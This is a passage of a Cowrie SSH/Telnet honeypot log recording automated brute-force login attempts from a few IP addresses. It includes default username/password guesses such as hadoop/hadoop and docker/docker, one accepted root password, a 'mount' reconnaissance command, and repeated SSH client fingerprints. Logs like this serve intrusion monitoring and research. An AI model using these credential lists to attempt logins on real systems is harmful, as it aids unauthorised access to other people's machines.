{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T05:40:46.769472Z","src_ip":"77.83.240.46","session":"6c42092e89ab"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T05:40:46.830918Z","src_ip":"77.83.240.46","session":"6c42092e89ab"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:49.729594Z","src_ip":"77.83.240.46","session":"6c42092e89ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41004,"dst_ip":"1.2.3.4","dst_port":22,"session":"325f55aee901","protocol":"ssh","message":"New connection: 212.227.235.229:41004 (1.2.3.4:22) [session: 325f55aee901]","sensor":"my-vps","timestamp":"2025-08-28T05:40:50.096333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:40:50.097384Z","src_ip":"212.227.235.229","session":"325f55aee901"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:40:50.240733Z","src_ip":"212.227.235.229","session":"325f55aee901"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:40:50.675047Z","src_ip":"212.227.235.229","session":"325f55aee901"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:51.820411Z","src_ip":"212.227.235.229","session":"325f55aee901"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43550,"dst_ip":"1.2.3.4","dst_port":22,"session":"6830caa1e565","protocol":"ssh","message":"New connection: 212.227.235.229:43550 (1.2.3.4:22) [session: 6830caa1e565]","sensor":"my-vps","timestamp":"2025-08-28T05:40:56.047681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:40:56.513268Z","src_ip":"212.227.235.229","session":"6830caa1e565"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:40:56.514031Z","src_ip":"212.227.235.229","session":"6830caa1e565"}
{"eventid":"cowrie.login.success","username":"root","password":"0890105521*#&!","message":"login attempt [root/0890105521*#&!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:40:59.769097Z","src_ip":"212.227.235.229","session":"6830caa1e565"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:41:01.031481Z","src_ip":"212.227.235.229","session":"6830caa1e565"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T05:41:01.032254Z","src_ip":"212.227.235.229","session":"6830caa1e565"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:01.577325Z","src_ip":"212.227.235.229","session":"6830caa1e565"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:01.726598Z","src_ip":"212.227.235.229","session":"6830caa1e565"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38800,"dst_ip":"1.2.3.4","dst_port":22,"session":"f845148f78d8","protocol":"ssh","message":"New connection: 212.227.125.160:38800 (1.2.3.4:22) [session: f845148f78d8]","sensor":"my-vps","timestamp":"2025-08-28T05:41:01.999864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:41:02.000859Z","src_ip":"212.227.125.160","session":"f845148f78d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:41:02.106000Z","src_ip":"212.227.125.160","session":"f845148f78d8"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T05:41:02.423304Z","src_ip":"212.227.125.160","session":"f845148f78d8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:03.531627Z","src_ip":"212.227.125.160","session":"f845148f78d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46710,"dst_ip":"1.2.3.4","dst_port":22,"session":"625c85a73dc7","protocol":"ssh","message":"New connection: 212.227.235.229:46710 (1.2.3.4:22) [session: 625c85a73dc7]","sensor":"my-vps","timestamp":"2025-08-28T05:41:05.072163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:41:05.073175Z","src_ip":"212.227.235.229","session":"625c85a73dc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:41:05.217019Z","src_ip":"212.227.235.229","session":"625c85a73dc7"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T05:41:05.651293Z","src_ip":"212.227.235.229","session":"625c85a73dc7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:06.825153Z","src_ip":"212.227.235.229","session":"625c85a73dc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60242,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca719e906013","protocol":"ssh","message":"New connection: 212.227.125.160:60242 (1.2.3.4:22) [session: ca719e906013]","sensor":"my-vps","timestamp":"2025-08-28T05:41:09.970310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:41:10.022548Z","src_ip":"212.227.125.160","session":"ca719e906013"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:41:10.106880Z","src_ip":"212.227.125.160","session":"ca719e906013"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-28T05:41:10.524139Z","src_ip":"212.227.125.160","session":"ca719e906013"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:11.793666Z","src_ip":"212.227.125.160","session":"ca719e906013"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37750,"dst_ip":"1.2.3.4","dst_port":22,"session":"56430e732632","protocol":"ssh","message":"New connection: 212.227.235.229:37750 (1.2.3.4:22) [session: 56430e732632]","sensor":"my-vps","timestamp":"2025-08-28T05:41:20.528994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:41:20.529869Z","src_ip":"212.227.235.229","session":"56430e732632"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:41:20.674906Z","src_ip":"212.227.235.229","session":"56430e732632"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-28T05:41:21.110352Z","src_ip":"212.227.235.229","session":"56430e732632"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:41:22.256918Z","src_ip":"212.227.235.229","session":"56430e732632"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46196,"dst_ip":"1.2.3.4","dst_port":23,"session":"654cada0a2b7","protocol":"telnet","message":"New connection: 212.227.235.229:46196 (1.2.3.4:23) [session: 654cada0a2b7]","sensor":"my-vps","timestamp":"2025-08-28T05:41:35.070965Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46209,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f4131aefbe7","protocol":"telnet","message":"New connection: 212.227.235.229:46209 (1.2.3.4:23) [session: 5f4131aefbe7]","sensor":"my-vps","timestamp":"2025-08-28T05:41:35.081067Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53284,"dst_ip":"1.2.3.4","dst_port":22,"session":"843d1a079fdb","protocol":"ssh","message":"New connection: 212.227.235.229:53284 (1.2.3.4:22) [session: 843d1a079fdb]","sensor":"my-vps","timestamp":"2025-08-28T05:41:39.440830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:41:39.461197Z","src_ip":"212.227.235.229","session":"843d1a079fdb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:41:39.605075Z","src_ip":"212.227.235.229","session":"843d1a079fdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53666,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e8f32e48255","protocol":"ssh","message":"New connection: 212.227.125.160:53666 (1.2.3.4:22) [session: 5e8f32e48255]","sensor":"my-vps","timestamp":"2025-08-28T05:41:39.852028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:41:39.868671Z","src_ip":"212.227.125.160","session":"5e8f32e48255"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:41:39.982709Z","src_ip":"212.227.125.160","session":"5e8f32e48255"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-28T05:41:40.190269Z","src_ip":"212.227.235.229","session":"843d1a079fdb"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:41:40.370157Z","src_ip":"212.227.125.160","session":"5e8f32e48255"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56566,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce3b079d7176","protocol":"ssh","message":"New connection: 212.227.125.160:56566 (1.2.3.4:22) [session: ce3b079d7176]","sensor":"my-vps","timestamp":"2025-08-28T05:41:40.397838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:41:40.398635Z","src_ip":"212.227.125.160","session":"ce3b079d7176"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 